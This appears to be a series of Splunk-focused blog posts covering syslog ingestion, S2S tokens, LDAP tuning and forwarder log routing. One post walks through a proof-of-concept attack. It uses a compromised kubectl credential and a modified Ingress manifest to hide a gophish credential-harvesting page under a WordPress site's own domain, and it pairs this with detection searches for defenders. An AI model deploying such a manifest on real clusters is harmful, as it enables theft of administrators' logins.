Syslog server you say

I’ve had quite a bit to say about syslog as a component of a streaming data architecture primarily feeding Splunk Enterprise (or Splunk Cloud). In seven days I will be presenting the culmination of many small developments that have taken shape as the brand-new Splunk Connect for Syslog (SC4S).

You don’t have to wait; swing over to Splunkbase: https://splunkbase.splunk.com/app/4740/#/details

SC4S is designed to:

Do the heavy lifting of deploying a functioning, current build of the awesome syslog-ng OSE (3.24.1 as of this posting); a minimal container run is sketched after this list.

Support many popular syslog vendor products out of the box, with zero configuration or as little configuration as a host glob or IP address.

Scale your Splunk deployment vertically by distributing events very evenly across indexers, second by second.

Scale your syslog-ng servers by reducing constraints on CPU and disk.

Reduce your exposure to data loss by minimizing the amount of data at rest on the syslog-ng instance

Promote great practices and collaboration. SC4S is a liberally licensed open source solution, and we will be able to collaborate directly with end users on filters and usage to promote great big data deployments.
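
If you want a preview of what deployment looks like, the sketch below shows the general shape of running the container. The image reference and the contents of the environment file are placeholders from memory, not the official quickstart; follow the SC4S documentation on Splunkbase and GitHub for the real values.

# Sketch only: run the SC4S container on the standard syslog ports, with the
# Splunk HEC URL and token supplied via an environment file (variable names
# are documented by SC4S; the image reference below is a placeholder).
docker run -d \
  --name sc4s \
  -p 514:514/tcp -p 514:514/udp \
  --env-file /opt/sc4s/env_file \
  splunk/sc4s:latest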

Personal thanks to many, but especially Mark Bonsack and Balazs Scheidler (the creator of syslog-ng).

Bias in ML

One day perhaps we can teach machines to avoid bias, but maybe, just maybe, we need to learn how to teach humans the same thing first.

https://tech.slashdot.org/story/19/08/16/1916202/the-algorithms-that-detect-hate-speech-online-are-biased-against-black-people

It shouldn’t be a news flash that biased people “train” bias into computers, just like we train bias into our children. We will one day realize we have no choice but hard, continuous work to eliminate bias.

Phishing from someone else’s container ship.

This is a theoretical attack abusing a compromised kubectl certificate pair and an exposed K8s API to deploy a phishing site transparently on your target's infrastructure. It is a difficult attack to pull off and requires existing compromised administrative access to the K8s cluster; a privileged insider or a compromised certificate-based authentication credential can be used.

  • Target: www.spl.guru, which is one of my test domains.
  • Desired outcome: detect an attempt to intercept the admin login for a WordPress site. We will use a fake email alert informing the administrator that a critical update must be applied.
  • We will deploy the site hidden behind the target's existing ingress controller. This allows us to use the customer's own domain and certificates, eliminating detection by domain name (typosquatting, etc.) and certificate transparency monitoring.

Phase one: Recon

Using kubectl, identify the namespaces and find the ingress serving the site you intend to compromise. For the purposes of my PoC, my target used a very obvious “wordpress” namespace.

kubectl -n wordpress get ing

NAME   HOSTS          ADDRESS                                                                PORTS   AGE
site   www.spl.guru   133a0685-wordpress-site-62d9-1332557661.us-east-1.elb.amazonaws.com   80      20h
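
It is also worth dumping the legitimate ingress definition, so the malicious manifest in the next phase can mirror its annotations exactly (resource names as discovered above):

kubectl -n wordpress get ing site -o yaml > site-ingress.yaml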

Phase two: Deploy gophish

I’m not going to go into details on deploying gophish and setting up or sending the phishing emails. That's beyond the scope of this blog post; I'm here to help the blue team, so let's get on to detection.

The following manifest hides the gophish instance on a path under the main site URL. Of note: in this case /wplogin.cgi is the real site, while /wplogin is where we are credential harvesting.

apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: "site"
  namespace: wordpress
  annotations:
    kubernetes.io/ingress.class: alb
    alb.ingress.kubernetes.io/scheme: internet-facing
    alb.ingress.kubernetes.io/tags: Environment=dev,Team=test
    alb.ingress.kubernetes.io/certificate-arn: arn:aws:acm:us-east-1:174701313045:certificate/15d484c8-ca0c-4194-a4ef-f38a43b7b977
    alb.ingress.kubernetes.io/listen-ports: '[{"HTTP": 80}, {"HTTPS": 443}]'
    alb.ingress.kubernetes.io/actions.ssl-redirect: '{"Type": "redirect", "RedirectConfig": {"Protocol": "HTTPS", "Port": "443", "StatusCode": "HTTP_301"}}'
    # external-dns.alpha.kubernetes.io/hostname: search.gdi.spl.guru.,master.gdi.spl.guru.
spec:
  rules:
    - host: www.spl.guru
      http:
        paths:
          - path: /wplogin
            backend:
              serviceName: gophish
              servicePort: 80
          - path: /
            backend:
              serviceName: wordpress
              servicePort: 80
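
With the compromised credential in hand, applying the manifest is a single command (the file name is just illustrative):

kubectl -n wordpress apply -f phish-ingress.yaml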

Phase three: Detecting what we did.

Using the K8s events and metadata onboarded with Splunk Connect for Kubernetes, we have some solid places to monitor for abuse. Side note: don't get hung up on "gophish"; it is a hammer of a tool, and your opponent may be much more subtle.

  • Modification to an ingress (in my case an AWS ALB). Ingress records in most environments will not change often; when they are changed, an associated approved deployment should also exist.

"kubernetes.io/ingress-name:" sourcetype="kube:container:alb-ingress-controller" modifying

  • New image, new image repository, or new registry. Maintain a list of approved images and registries and alert when an image not on the pre-defined list is used. This may be noisy in dev clusters; for non-prod clusters, reporting may be better than alerting. (A sketch of this comparison against a lookup follows the base search below.)

index=em_meta "spec.containers{}.image"="*"
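
As a rough sketch, the base search above can be compared against a pre-defined lookup of approved images; the lookup file and its image field here are hypothetical and would need to be maintained by you:

index=em_meta "spec.containers{}.image"="*"
| rename "spec.containers{}.image" as image
| search NOT [| inputlookup approved_images.csv | fields image]
| dedup image
| table image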

 

“Safely” Exposing Splunk S2S to the internet

Splunk has a great token-based authentication solution for its S2S protocol; it was added several versions back. Inputs have "just worked" and remained unchanged for so long that many administrators have not noticed the feature. It allows you to safely expose indexers or heavy forwarders so that UFs on the internet can forward data back in without a VPN. This is super critical for Splunk endpoints that are not constantly connected to the corporate network via VPN.

When a Splunk input is exposed to the internet there is a risk of a resource-exhaustion DoS: a simple type of attack where junk data or "well formed but misleading" data is fed to Splunk until all CPU, memory, or disk is consumed.

Once this feature is enabled, all UF/HF clients must supply a token to be allowed to connect. If you are adding this feature to a running Splunk deployment, be ready to push the outputs.conf and inputs.conf updates in close succession to prevent a break in data flow.

Update your inputs.conf as follows; the excerpt below is from the inputs.conf spec, and a concrete example follows it. Note that you can use multiple tokens, just like HEC, which limits how many tokens must be replaced if a stolen token is used in a DoS attack.

# Access control settings.
[splunktcptoken://<token name>]
* Use this stanza to specify forwarders from which to accept data.
* You must configure a token on the receiver, then configure the same
  token on forwarders.
* The receiver discards data from forwarders that do not have the
  token configured.
* This setting is enabled for all receiving ports.
* This setting is optional.

token = <string>
* The token should match the regex [A-Za-z0-9\-]+ and have a minimum length of 12.
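
A concrete example of the receiving side might look like this (the port, token name, and token value are illustrative; generate your own token):

# inputs.conf on the indexer or heavy forwarder
[splunktcp://9997]
disabled = 0

[splunktcptoken://internet_uf_fleet]
token = B8F1A2C34D5E6F7A8B9C0D1E2F3A4B5C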

Update outputs.conf to use the token value of your choice from inputs.conf. Again, the spec excerpt below is followed by a concrete example.

[tcpout:<target_group>]
token = <string>
* The access token for receiving data.
* If you configured an access token for receiving data from a forwarder,
  Splunk software populates that token here.
* If you configured a receiver with an access token and that token is not
  specified here, the receiver rejects all data sent to it.
* This setting is optional.
* No default.
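
And the matching forwarder side, reusing the same token (the group name and server list are illustrative):

# outputs.conf on the universal forwarder
[tcpout]
defaultGroup = internet_indexers

[tcpout:internet_indexers]
server = idx1.example.com:9997, idx2.example.com:9997
token = B8F1A2C34D5E6F7A8B9C0D1E2F3A4B5C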

Keeping up with MaxMind for Splunk and Splunk Cloud

This has been a long time coming: today version 4.0.0 of SecKit for Geolocation with MaxMind is available for Splunk via Splunkbase and for Splunk Cloud. This version includes a built-in solution for keeping the database files up to date for both free and paid subscribers. Free subscribers are, of course, limited to the basic information equivalent to Splunk's built-in iplocation command. Commercial subscribers can use all of the available fields from their licensed files. Jump over to Splunkbase to check it out: https://splunkbase.splunk.com/app/3022/
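
For context, the built-in command the free data set is measured against is used like this (the index and field names are illustrative):

index=firewall action=blocked
| iplocation src_ip
| stats count by Country, City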

To HEC with syslog – All grown up

A few years ago, flying across the Atlantic and unable to sleep, I had an idea to integrate common syslog aggregation servers with Splunk's then-new HTTP Event Collector rather than files and the tried and true Universal Forwarder. This little idea, implemented in Python, started solving real problems of throughput and latency while reducing the complexity of configuring syslog aggregation servers. I'm very pleased to say the Python script I created is now obsolete. The upstreams of the leading syslog server products, syslog-ng and rsyslog, have implemented maintained modules. Even more exciting, Mark Bonsack has invested considerable time to further develop modular configurations for both, making it even easier to get data through syslog and into Splunk!
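
To give a flavor of what "native" looks like, here is a minimal sketch of a syslog-ng http() destination pointed at HEC. The URL and token are placeholders, and the maintained modules and modular configurations referenced below handle batching, templates, and sourcetype mapping far better than this bare example:

# syslog-ng OSE: bare-bones HEC destination (sketch only)
destination d_splunk_hec {
    http(
        url("https://splunk.example.com:8088/services/collector/event")
        method("POST")
        headers("Authorization: Splunk 00000000-0000-0000-0000-000000000000")
        body("$(format-json time=$UNIXTIME host=$HOST sourcetype=syslog event=$MESSAGE)")
    );
};

log {
    source(s_network);   # assumes an existing network source definition
    destination(d_splunk_hec);
};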

Native syslog -> HTTP Event Collector modules

Modular Configuration Repositories

Quick Public Service Notice

While all Linux distributions include a syslog server, it should NOT be used as the production syslog aggregation solution. Linux distros are often many point releases behind or, worse, selectively backport patches based only on their own customer-reported issues. Before attempting to build a syslog aggregation solution for production, it is critical that you source current upstream binaries or build your own.

Is your LDAP Slow? It might make your Splunk Slow

I’ve had this crop up enough times that I think it's worth a short post. Most Splunk deployments use local and/or LDAP authentication. LDAP configuration is something of a black art, and often the minimal configuration that works is the first and last configuration considered. It is worth your time as an administrator to optimize your LDAP configuration, or better yet, move to the more secure and reliable SAML standard.

Things to consider

  • Stop using LDAP and use SAML.
  • LDAP authentication should never be enabled on indexers; if you have enabled it, remove it. Indexers rarely require interactive authentication, and when they do it applies only to admins and under very strict conditions.
  • Ensure the group BIND and group filters are both in use and limit the groups to only those required for Splunk access management.
  • Ensure the user BIND and user filters are appropriate to limit the potential users to only those who may log in to Splunk.
  • Validate that the number of users returned by the LDAP query is under 1000, or increase the number of precached users via limits.conf to an appropriate value (a sketch follows this list).
  • Ensure dnsmasq or an alternative DNS caching client is installed on Linux search heads and indexers.
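
A minimal sketch of the precache adjustment; I am assuming the max_users_to_precache setting as it appears in recent limits.conf.spec versions, so verify the name and default for your release:

# limits.conf on search heads that use LDAP authentication
[ldap]
# Default is 1000; raise only as far as your real user population requires.
max_users_to_precache = 5000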

Stages to LDAP Auth

  • Interactive user login, ad-hoc search, or scheduled report execution
  • Check the user cache; continue only if the user is not cached or the cache has expired
  • DNS lookup to resolve the LDAP host to an IP (this is why a DNS cache on Linux is important)
  • TCP connection to the LDAP server
  • Post the query for the specific user to LDAP
  • Wait for the response
  • Process referrals, if applicable, by repeating the above sequence

The time taken for each DNS query and LDAP query is added to the time it takes to log in to the Splunk UI and to execute an ad-hoc search or scheduled report. It's important to ensure the DNS and LDAP infrastructure is highly available and able to service potentially thousands of requests per second. Proper use of caching ensures resources on the Splunk server, including TCP client sessions, are not exhausted, causing users to wait in line for their turn at authentication or, in the worst case, hit timeouts and authorization failures.

 

 

Redirecting _internal for a large forwarder deployment

It often goes unnoticed because there is no license charge associated with the internal logs of Splunk's Universal Forwarder and, in some cases, heavy forwarders. In very large deployments this can be a significant portion of the storage used per day. Do you really need to keep those events around as long as the events associated with the Splunk Enterprise instances? Probably not.

License Warning – Updated

It has been pointed out that this change WILL impact license usage on recent versions of Splunk. On older versions, and for customers with EAA agreements in place, this is OK. If you are on a recent version (I'm not sure exactly which), this change will impact your license usage.

Warning!

The following changes will disable the Splunk Monitoring Console's built-in forwarder monitoring feature. You can customize the searches, but be aware this is not upgrade-safe.

Second Warning!

If you have any custom forwarder monitoring searches, dashboards, or alerts, they may be impacted.

Define an index

The index we need to define is _internal_forwarder. The following sample configuration will keep about 3 days of data from our forwarders; adjust according to need.

[_internal_forwarder]
maxWarmDBCount = 200
frozenTimePeriodInSecs = 259200
quarantinePastSecs = 459200
homePath = $SPLUNK_DB/$_index_name/db
coldPath = $SPLUNK_DB/$_index_name/colddb
thawedPath = $SPLUNK_DB/$_index_name/thaweddb
maxHotSpanSecs = 43200
maxHotBuckets = 10

Change the index for internal logs

We need to create a new "TA" named "Splunk_TA_splunkforwarder". We will CAREFULLY use the deployment server to push this to forwarders only. DO NOT push this to any Splunk Enterprise instance (CM/LM/MC/SH/IDX/deployer/DS), but you may push it to a "heavy" or intermediate forwarder. The app only needs two files in default/: app.conf and inputs.conf. A serverclass.conf sketch for scoping the push follows the app contents below.

#app.conf
[install]
state_change_requires_restart = true
is_configured = 0
state = enabled
build = 2

[launcher]
author = Ryan Faircloth
version = 1.0.0

[ui]
is_visible = 0
label = Splunk_UF Inputs

[package]
id = Splunk_TA_splunkforwarder
#inputs.conf
[monitor://$SPLUNK_HOME/var/log/splunk]
index = _internal_forwarder
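
A sketch of the deployment server scoping follows; the host patterns are placeholders and the whitelist/blacklist must be adapted so that no Splunk Enterprise instance ever matches:

# serverclass.conf on the deployment server (host patterns are placeholders)
[serverClass:universal_forwarders]
whitelist.0 = uf-*
blacklist.0 = *idx*
blacklist.1 = *sh*

[serverClass:universal_forwarders:app:Splunk_TA_splunkforwarder]
restartSplunkd = true
stateOnClient = enabled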

Check our Work

First, let's check the positive case and make sure UFs have moved to the new index; we should get results.

index=_internal_forwarder source=*splunkforwarder*

Second, let's check the negative case and make sure only UF logs were moved; we should get no results.

index=_internal_forwarder source=*splunk* NOT source=*splunkforwarder*

Updates

  • Index definition example used "_internal" rather than "_internal_uf"
  • renamed app to "Splunk_TA_splunkforwarder"
  • renamed index to _internal_forwarder